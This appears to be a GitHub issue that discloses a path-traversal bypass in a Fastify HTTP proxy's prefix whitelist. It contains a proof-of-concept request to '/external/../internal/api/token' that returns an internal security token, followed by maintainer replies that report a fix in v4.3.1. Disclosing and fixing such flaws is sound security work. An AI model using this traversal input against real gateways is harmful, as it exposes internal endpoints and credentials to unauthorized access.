API whitelisting behind gateway

Question

API whitelisting behind gateway

artur-ma opened this issue 4 years ago · 2 comments

This is not a real security breach I guess, but some companies rely on api-gateways to whitelist their APIs that are exposed to the world.

For example, I would like to expose only those APIs that have /external prefix

'use strict'

const Fastify = require('fastify')

const target = Fastify({
  logger: false
})

const server = Fastify({
  logger: false
})

target.get('/internal/api/token', (request, reply) => {
  reply.send('Security token: 123')
})

target.get('/external/api/v1', (request, reply) => {
  reply.send('hello world')
})

const proxy = require('fastify-http-proxy')

server.register(proxy, {
  upstream: 'http://localhost:3001',
  prefix: '/external',
  rewritePrefix: '/external',
})


target.listen(3001, (err) => {
  if (err) {
    throw err
  }

  server.listen(3000, (err) => {
    if (err) {
      throw err
    }
  })
})

then execute this snippet(does not work with cURL for some reason):

URL: 'http://127.0.0.1:3000/external/../internal/api/token

var request = require('request');
request.get('http://127.0.0.1:3000/external/../internal/api/token', function (error, response) {
  if (error) throw new Error(error);
  console.log(response.body);
});

will result:

$ node req.js 
Security token: 123

Answer 1 · 2021-02-18T23:25:23.000Z

We are working on this and a fix will be published soon.

Answer 2 · 2021-02-19T18:36:31.000Z

This was fixed in v4.3.1.